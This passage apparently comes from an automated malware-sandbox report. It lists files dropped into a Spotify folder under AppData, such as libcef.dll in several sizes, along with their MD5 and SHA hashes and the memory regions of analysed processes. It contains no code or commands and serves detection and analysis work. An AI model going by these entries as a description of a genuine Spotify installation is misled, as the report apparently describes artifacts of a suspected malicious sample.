                        2a4af8feec3f311242e6076bf298fe0f28d94224d96780d53556fb06e8cb2926

                        SHA512

                        40a460239c1f047e4847cec50ecc4ec72b94448199196803401366bb772da6cc786343242b6a94fa407e87a10ab4d4fa7e24567df1fe1c2c792f943928075d11

                      • C:\Users\Admin\AppData\Roaming\Spotify\libcef.dll
                        Filesize

                        159.6MB

                        MD5

                        de764f73f39ca94e15f8a98b1a1e3762

                        SHA1

                        20cd8317af67f924add628f22ad9279d4230301c

                        SHA256

                        25e06e2fbd729bc7d50a1d34a6ac17cbd304639c398bf90000b571bc8f642fa1

                        SHA512

                        529086d5087b4b10cd15927dd36c55075448c17f400fc35d6546837f6a4bc5ac72f41d3afca377cd2d5fe03fbf0b9e2f69309243672b4b005090854f585cb0f6

                      • C:\Users\Admin\AppData\Roaming\Spotify\libcef.dll
                        Filesize

                        159.6MB

                        MD5

                        de764f73f39ca94e15f8a98b1a1e3762

                        SHA1

                        20cd8317af67f924add628f22ad9279d4230301c

                        SHA256

                        25e06e2fbd729bc7d50a1d34a6ac17cbd304639c398bf90000b571bc8f642fa1

                        SHA512

                        529086d5087b4b10cd15927dd36c55075448c17f400fc35d6546837f6a4bc5ac72f41d3afca377cd2d5fe03fbf0b9e2f69309243672b4b005090854f585cb0f6

                      • C:\Users\Admin\AppData\Roaming\Spotify\libcef.dll
                        Filesize

                        114.6MB

                        MD5

                        13fa971022a606ddcd4d08b95040b516

                        SHA1

                        6f8c7f2f61a313586f1567a9524095a20589d84e

                        SHA256

                        11572536cac90c5b16d04fdc6d2ef255e58c99fce960b06c48907b5e2045c946

                        SHA512

                        7059f62f5de59517d42ba1329fe2d892a05c3153e493124ba61e5ab88964bdc041916630cb021c3d4e07cd738844dadd648a84272955b1048acf69d3a652a76f

                      • C:\Users\Admin\AppData\Roaming\Spotify\libcef.dll
                        Filesize

                        122.2MB

                        MD5

                        3fa5f85c97dd23562de484a4462d9fb1

                        SHA1

                        69a00dae0f697044175ebcc0cf627d8664ca3b73

                        SHA256

                        8fa1a579fe978043b80590c24975357dae55d57eec8306c7a3354074337b408e

                        SHA512

                        e044020fe46fc1aa1ff4ae3fe11aa318f54875b00641817c0216f33940f7cab6d7babfe6ac9acfb8a6c9dca4582e3087b65130f2a7b2080d28c62ba78d5df373

                      • C:\Users\Admin\AppData\Roaming\Spotify\libcef.dll
                        Filesize

                        116.9MB

                        MD5

                        5bf812dda5391d1e9fdde58f446e5165

                        SHA1

                        8fb5779600aa0e44573d041155969cdfa246c286

                        SHA256

                        d41ebb1e83e7996f3f6bc09d470a6f77c380690039338c3b5cec7c44f496c296

                        SHA512

                        68db7486dca4ecc69264d024f5a7d52c133ff767711b454dd8ea298c701f04d47bbfeb9d9cc9181e61827bfece316ffeb97ed61ad5b9f7baff95ff876962677e

                      • C:\Users\Admin\AppData\Roaming\Spotify\libcef.dll
                        Filesize

                        120.8MB

                        MD5

                        fb70ea7970f02d2a63785d735ea5ffe3

                        SHA1

                        a42dd349dcebcbcacbaa461146b4fa02fefb1232

                        SHA256

                        af42cdd053cb6455dfff329b09f617a708202babc6bb1054966c67233495bb7d

                        SHA512

                        f70072b84b384c93692966be3a4ac2d436f84e88ba031428963bf9cd85beaab6a970309fbb1b315a6caf30c1ed47349a6097199a0de8cee182d7429c95fe8433

                      • C:\Users\Admin\AppData\Roaming\Spotify\libcef.dll
                        Filesize

                        105.2MB

                        MD5

                        66a64e8e29f14006d5af75e2dd86929b

                        SHA1

                        cc134387ec0ba1b760c51e9e0b81dced710c8af9

                        SHA256

                        d5ac10720f03587356b89a87d5e24cc2450a74669533cf9e39d2950c90432891

                        SHA512

                        12dfc67e6f8cf41faa0dd2c066fb190ac314d73dc21c768ec5f772ac39638cd23802b8a47f7eb9b994fe77041bdf793fc7b15d3225d805030970c1ce206d70b5

                      • C:\Users\Admin\AppData\Roaming\Spotify\libegl.dll
                        Filesize

                        374KB

                        MD5

                        82c4112ee87d49dddb2914a893d3606c

                        SHA1

                        8d27b085db1dc340605e350c68759a15c2378c9a

                        SHA256

                        90348cdb7672c285b26bd1fa24ca95713c9d5768b3b1c87719f27422ac13b00c

                        SHA512

                        b175972274ec9e91a620442b3abb7f2de207980c6a9a857026e1abb42bb8515c0784a6cffffa49937bbd0dcf689baa171e66725d218cc227b44b9fb1c895eb01

                      • C:\Users\Admin\AppData\Roaming\Spotify\libglesv2.dll
                        Filesize

                        6.3MB

                        MD5

                        8819371e2e93ee94ff5993d4396e96eb

                        SHA1

                        c9a84c4af01435e28e7754d279ec2983ff56d20a

                        SHA256

                        2a4af8feec3f311242e6076bf298fe0f28d94224d96780d53556fb06e8cb2926

                        SHA512

                        40a460239c1f047e4847cec50ecc4ec72b94448199196803401366bb772da6cc786343242b6a94fa407e87a10ab4d4fa7e24567df1fe1c2c792f943928075d11

                      • C:\Users\Admin\AppData\Roaming\Spotify\locales\en-US.pak
                        Filesize

                        354KB

                        MD5

                        86496c78e240e7af23c3650556ef5428

                        SHA1

                        fb16780ffe50dd95fa6ead35228c7cc78af5d235

                        SHA256

                        28d73900978d3f56f4b6e626b9566d62ee83b0d043c1060068b8ce5bbf7eb76e

                        SHA512

                        4dd845c64500247b5e557d2e40cdbe87cfcb03efa3749aa6c33cebac502743e95ae303babdec274edde334ca42cb8d9735488dea0a79e105924884c8bd80f8f6

                      • C:\Users\Admin\AppData\Roaming\Spotify\locales\en.mo
                        Filesize

                        13KB

                        MD5

                        159d3901f386388df374566fb6fcd622

                        SHA1

                        7ef0b2b651a7bdcba44efafb5e67b922d447f198

                        SHA256

                        e531925d86eb4f14ff09675bebce21a5ab6301ab139052f0514752e8ea346a19

                        SHA512

                        c951416ccfca17a533719e00d244844469a35dd7c6b1b21ad24daa400881b265750d97039c7e7f37e5d058b92402b1a016ca57315adb89627e0692330bc3282f

                      • C:\Users\Admin\AppData\Roaming\Spotify\resources.pak
                        Filesize

                        7.2MB

                        MD5

                        d805cd43c1035797466a81be1bdb345e

                        SHA1

                        b9867617407747b97c98cf4965eac2a0548a02af

                        SHA256

                        b54a29eaffdcb6348741998ed60f7c48ff5acd8907bef892f93ad007b40c33a7

                        SHA512

                        17b7553385a3a29edc2036dab6a138f7af7e37a764de9cbc7ed1b451a48ae72f8367cb52fa7df76be1eb8865dabbe9c007ac339aafa14c39c032096354d5d926

                      • C:\Users\Admin\AppData\Roaming\Spotify\v8_context_snapshot.bin
                        Filesize

                        586KB

                        MD5

                        a866325618b5135ba45266941bfabf8e

                        SHA1

                        98ba530b7859e517373d92a8ed77a88d049cddad

                        SHA256

                        f074d6cf97830861f97f2c353e7d6d8e7e194d2ac127adc6e8354a08a364d5ba

                        SHA512

                        dbe1bc5caed14737ae1d96dda38c33fa37ada4a9e206f2aa02a5598ad71f574ef379d09e5c262b1ef31deb7507996968607f5f57a6f688c90beb2a79c46ae49a

                      • C:\Users\Admin\AppData\Roaming\Spotify\vk_swiftshader.dll
                        Filesize

                        4.1MB

                        MD5

                        afd8fb971f6f046e9495ac286c092ac6

                        SHA1

                        778886f80f415143f2c1e426e7a53dbc2a2e8010

                        SHA256

                        f628eb8271afd0a10f84a4834205bfc5aa5fc2a6798afbe94da7e47fd87bda3c

                        SHA512

                        55881e229816c9ce60e100c81d1eca1b9a18215b9601808870808a3b7bb6e5b4bc4c930e320fcd54bf41f78ee2458a742f48799c60caeeca3f63d705eea6ee66

                      • C:\Users\Admin\AppData\Roaming\Spotify\vk_swiftshader.dll
                        Filesize

                        4.1MB

                        MD5

                        afd8fb971f6f046e9495ac286c092ac6

                        SHA1

                        778886f80f415143f2c1e426e7a53dbc2a2e8010

                        SHA256

                        f628eb8271afd0a10f84a4834205bfc5aa5fc2a6798afbe94da7e47fd87bda3c

                        SHA512

                        55881e229816c9ce60e100c81d1eca1b9a18215b9601808870808a3b7bb6e5b4bc4c930e320fcd54bf41f78ee2458a742f48799c60caeeca3f63d705eea6ee66

                      • C:\Users\Admin\AppData\Roaming\Spotify\vk_swiftshader_icd.json
                        Filesize

                        106B

                        MD5

                        8642dd3a87e2de6e991fae08458e302b

                        SHA1

                        9c06735c31cec00600fd763a92f8112d085bd12a

                        SHA256

                        32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9

                        SHA512

                        f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

                      • C:\Users\Admin\AppData\Roaming\Spotify\vulkan-1.dll
                        Filesize

                        779KB

                        MD5

                        599d0c3f810ada263016624a90a24650

                        SHA1

                        584b4e9c9b008f7451aa4b8ad4c7fa5fae4fccd9

                        SHA256

                        f5d693c01be70c2c44cb2eed127ac50bc65bb8a3006b5d53dbb1fa6819e153c5

                        SHA512

                        619def3faf594736b7a408eb25b0849544ea4f150da1196c5ca44afb7e6d33255a3ffe3d23373b30abcdf6050c3bb3f4fa4a84013c3194660ef97405e4f5c657

                      • C:\Users\Admin\AppData\Roaming\Spotify\vulkan-1.dll
                        Filesize

                        779KB

                        MD5

                        599d0c3f810ada263016624a90a24650

                        SHA1

                        584b4e9c9b008f7451aa4b8ad4c7fa5fae4fccd9

                        SHA256

                        f5d693c01be70c2c44cb2eed127ac50bc65bb8a3006b5d53dbb1fa6819e153c5

                        SHA512

                        619def3faf594736b7a408eb25b0849544ea4f150da1196c5ca44afb7e6d33255a3ffe3d23373b30abcdf6050c3bb3f4fa4a84013c3194660ef97405e4f5c657

                      • \??\pipe\crashpad_1344_ZAMELFWXSEXUREMB
                        MD5

                        d41d8cd98f00b204e9800998ecf8427e

                        SHA1

                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                        SHA256

                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                        SHA512

                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                      • memory/1084-333-0x0000000000400000-0x0000000001711000-memory.dmp
                        Filesize

                        19.1MB

                      • memory/1084-337-0x0000000000400000-0x0000000001711000-memory.dmp
                        Filesize

                        19.1MB

                      • memory/1344-525-0x0000000000400000-0x0000000001711000-memory.dmp
                        Filesize

                        19.1MB

                      • memory/1344-381-0x0000000000400000-0x0000000001711000-memory.dmp
                        Filesize

                        19.1MB

                      • memory/1452-501-0x0000000000400000-0x0000000001711000-memory.dmp
                        Filesize

                        19.1MB

                      • memory/2144-536-0x0000018210030000-0x0000018210050000-memory.dmp
                        Filesize

                        128KB

                      • memory/2144-532-0x0000018210070000-0x0000018210090000-memory.dmp
                        Filesize

                        128KB

                      • memory/2144-534-0x0000018210050000-0x0000018210070000-memory.dmp
                        Filesize

                        128KB

                      • memory/3976-458-0x0000000000400000-0x0000000001711000-memory.dmp
                        Filesize

                        19.1MB

                      • memory/4208-500-0x0000000000400000-0x0000000001711000-memory.dmp
                        Filesize

                        19.1MB

                      • memory/4520-400-0x0000000000400000-0x0000000001711000-memory.dmp
                        Filesize

                        19.1MB

                      • memory/4848-459-0x0000000000400000-0x0000000001711000-memory.dmp
                        Filesize

                        19.1MB

                      • memory/5032-155-0x0000013E28240000-0x0000013E28250000-memory.dmp
                        Filesize

                        64KB

                      • memory/5032-147-0x0000013E29420000-0x0000013E2942A000-memory.dmp
                        Filesize

                        40KB

                      • memory/5032-154-0x0000013E28240000-0x0000013E28250000-memory.dmp
                        Filesize

                        64KB

                      • memory/5032-152-0x0000013E28D70000-0x0000013E28F8C000-memory.dmp
                        Filesize

                        2.1MB

                      • memory/5032-150-0x0000013E28240000-0x0000013E28250000-memory.dmp
                        Filesize

                        64KB

                      • memory/5032-149-0x0000013E29620000-0x0000013E29634000-memory.dmp
                        Filesize

                        80KB

                      • memory/5032-148-0x0000013E29490000-0x0000013E294B6000-memory.dmp
                        Filesize

                        152KB

                      • memory/5032-159-0x0000013E28240000-0x0000013E28250000-memory.dmp
                        Filesize

                        64KB

                      • memory/5032-138-0x0000013E28D40000-0x0000013E28D62000-memory.dmp
                        Filesize

                        136KB

                      • memory/5032-156-0x0000013E28240000-0x0000013E28250000-memory.dmp
                        Filesize

                        64KB

                      • memory/5032-146-0x0000013E29400000-0x0000013E29416000-memory.dmp
                        Filesize

                        88KB

                      • memory/5032-145-0x0000013E28240000-0x0000013E28250000-memory.dmp
                        Filesize

                        64KB

                      • memory/5032-144-0x0000013E28240000-0x0000013E28250000-memory.dmp
                        Filesize

                        64KB

                      • memory/5032-336-0x0000013E2A350000-0x0000013E2A512000-memory.dmp
                        Filesize

                        1.8MB

                      • memory/5032-338-0x0000013E2AA50000-0x0000013E2AF78000-memory.dmp
                        Filesize

                        5.2MB

                      • memory/5032-339-0x0000013E28DA0000-0x0000013E28DAA000-memory.dmp
                        Filesize

                        40KB

                      • memory/5032-340-0x0000013E28DD0000-0x0000013E28DE2000-memory.dmp
                        Filesize

                        72KB

                      • memory/5032-143-0x0000013E28240000-0x0000013E28250000-memory.dmp
                        Filesize

                        64KB